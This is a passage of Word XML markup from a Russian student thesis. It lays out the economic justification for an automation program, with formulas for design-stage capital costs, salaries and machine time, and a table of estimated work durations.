          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - соответственно эксплуатационные расходы до и после внедрения разрабатываемой программы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ΔРп - экономия от повышения производительности труда дополнительных пользователей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет капитальных затрат на проектирование и внедрение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В случае если оценивать экономический эффект с учетом всех деталей, то капитальные затраты на проектирование и внедрение рассчитываются с учетом длительности работ на этом этапе. Итак, рассмотрим подробнее расчет капитальных затрат на проектирование и внедрение системы автоматизации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Под проектированием понимается совокупность работ, которые необходимо выполнить, чтобы спроектировать систему, часть системы или поставленную задачу. Под внедрением понимается комплекс работ по вводу в промышленную эксплуатацию системы с возможными ее доработками.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для расчета затрат на этапе проектирования необходимо определить продолжительность каждой работы, начиная с составления технического задания и заканчивая оформлением документов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Продолжительность работ определяется либо по нормативам (при этом применяют специальные таблицы), либо рассчитывают их на основании экспертных оценок по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=(3*Тmin+2*Тmax)/5</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> (2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Т</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> - ожидаемая продолжительность работ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тmin и Тmax ~ соответственно наименьшая и наибольшая по мнению эксперта длительность работы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Данные расчетов ожидаемой длительности работ приведены в таблицу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица длительности работ на этапе проектирования (пример)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6009"/>
        <w:gridCol w:w="1177"/>
        <w:gridCol w:w="1250"/>
        <w:gridCol w:w="813"/>
      </w:tblGrid>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наименование работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2936" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Длительность работ, дней</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>минимум</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1135" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>максимум</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ожид.</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lastRenderedPageBreak/>
              <w:t>Разработка технического задания</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1</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2</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2</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Анализ технического задания</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2</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5</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3</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Изучение литературы</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5</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10</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7</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Работа в библиотеке с источниками</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Знакомство с основными этапами дипломной работы</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1</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3</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2</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Оформление ТЗ</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1</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2</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2</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Разработка алгоритма</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2</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5</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3</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Доработки программы</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10</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20</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15</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Отладка программы</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15</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20</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18</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Экономическое обоснование</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1</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3</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2</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Оформление пояснительной записки</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3</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7</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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6009" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Выполнение плакатов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1047" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1135" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Капитальные затраты на этапе проектирования Кк рассчитываются по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kк=С + Zп+Mп+H</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(3),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где С – первоначальная стоимость программного продукта;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zп - заработная плата специалистов на всех этапах проектирования и внедрения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мп - затраты на использование ЭВМ на этапе проектирования и внедрения;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Н - накладные расходы на этапе проектирования и внедрения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Одним из основных видов затрат на этапе проектирования является заработная плата специалиста, которая рассчитывается по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zп=Zп*Tп*(l+Aс/100)*(l+Aп/100)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Zп- заработная плата разработчика на этапе проектирования;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zд  - дневная заработная плата разработчика на этапе проектирования;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ас - процент отчислений на социальное страхование;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ап - процент премий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В общем случае, расходы на машинное время состоят из расходов на процессорное время (при работе с объектным или абсолютным модулем) и расходов на дисплейное время. Формула для расчетов имеет вид:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>М=tд*Сд+ tп*Cп</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>(5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Сп и Сд - соответственно стоимости одного часа процессорного и дисплейнного времени;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tд и tп - соответственно процессорное и дисплейное время, необходимое для решения задачи (час).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расходы на эксплуатационные принадлежности определяются простым подсчетом затрат на их приобретение по оптовым (или свободным) ценам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Так как программа разработана на современных быстродействующих компьютерах, то в дополнительном процессорном времени необходимости нет, т.е. принимаются как Сп=0 и tп=0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При расчете Мп следует учитывать время на подготовку исходных текстов программ, их отладку и решение контрольных примеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Накладные расходы согласно формулы (2) составляют 80-120% от заработной платы персонала занятого эксплуатацией программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В случае если проектирование и внедрение средства автоматизации полностью осуществляет сторонняя организация, то можно использовать упрощенную схему расчета, т.е. в качестве капитальных затрат на проектирование и внедрение принять суммы уплаченные сторонней организации, включая первоначальную стоимость средства автоматизации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="194" w:name="_Toc451745938"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Состав эксплуатационных расходов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="194"/>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В эксплуатационные расходы входят:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
